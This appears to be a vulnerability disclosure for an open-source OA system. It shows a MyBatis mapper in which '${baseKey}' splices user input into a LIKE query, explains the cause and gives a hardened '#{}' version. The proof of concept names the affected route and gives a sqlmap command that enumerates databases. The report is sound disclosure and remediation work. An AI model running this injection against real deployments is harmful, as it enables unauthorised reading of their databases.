VulReq/oa_system
# oa_system

# SQL injection

The vulnerability was found by downloading the program's source code and deploying it locally and online for testing.

Location:

src/main/resources/mappers/notice-mapper.xml

Code:
```xml
<select id="sortMyNotice" resultType="java.util.Map">
  SELECT n.*,u.* FROM
  aoa_notice_list AS n LEFT JOIN aoa_notice_user_relation AS u ON
  n.notice_id=u.relatin_notice_id WHERE u.relatin_user_id=#{userId}
  <if test="baseKey !=null">
    <!-- ${} is spliced into the SQL text verbatim; it is not a bound JDBC parameter -->
    and n.title LIKE '%${baseKey}%'
  </if>
</select>
```
Line: 27

Harm:

An attacker needs only an ordinary user account to trigger the vulnerability and use the SQL injection to read database information.

Conditions for execution:

A regular account is required.

Edition:

Version = all

Cause:

`${}` is used directly for the fuzzy query after LIKE, so the parameter is spliced into the SQL string instead of being bound, which creates the vulnerability:

and n.title LIKE '%${baseKey}%'
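As an added example (not the project's own code), the same mapper fragment with the fuzzy query rewritten so the search term is bound as a JDBC parameter instead of being spliced into the SQL text. The table and column names are the ones shown in the report; the `<bind>` variable name `pattern` and the non-empty check on `baseKey` are assumptions for illustration:

```xml
<!-- Hardened version of sortMyNotice (added example, not from the oa_system repository). -->
<select id="sortMyNotice" resultType="java.util.Map">
  SELECT n.*, u.*
  FROM aoa_notice_list AS n
  LEFT JOIN aoa_notice_user_relation AS u
    ON n.notice_id = u.relatin_notice_id
  WHERE u.relatin_user_id = #{userId}
  <if test="baseKey != null and baseKey != ''">
    <!-- Build the wildcard pattern in OGNL, then pass it through #{}.
         #{} becomes a ? placeholder set via PreparedStatement, so the
         user-supplied value can never change the structure of the query.
         "pattern" is an assumed bind name. -->
    <bind name="pattern" value="'%' + baseKey + '%'" />
    AND n.title LIKE #{pattern}
  </if>
</select>
```

Two practical notes. First, binding removes the injection, but `%` and `_` inside `baseKey` are still interpreted as LIKE wildcards; if that matters, escape them in the service layer and add an `ESCAPE` clause, or use `CONCAT('%', #{baseKey}, '%')` on MySQL and accept wildcard matching. Second, the same pattern is easy to audit across a codebase: a search of `src/main/resources/mappers` for `${` finds every place where MyBatis performs raw string substitution, and each hit should be either converted to `#{}` or justified (for example a column name checked against an allow-list in Java).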
POC:

Construct the URL according to the controller's route:

http://localhost/informlistpaging?baseKey=

Payload:

Since login is required, capture the request with Burp Suite, save it to a txt file, and then test it with sqlmap:

sqlmap.py -r D:\test.txt --random-agent --dbs --current-db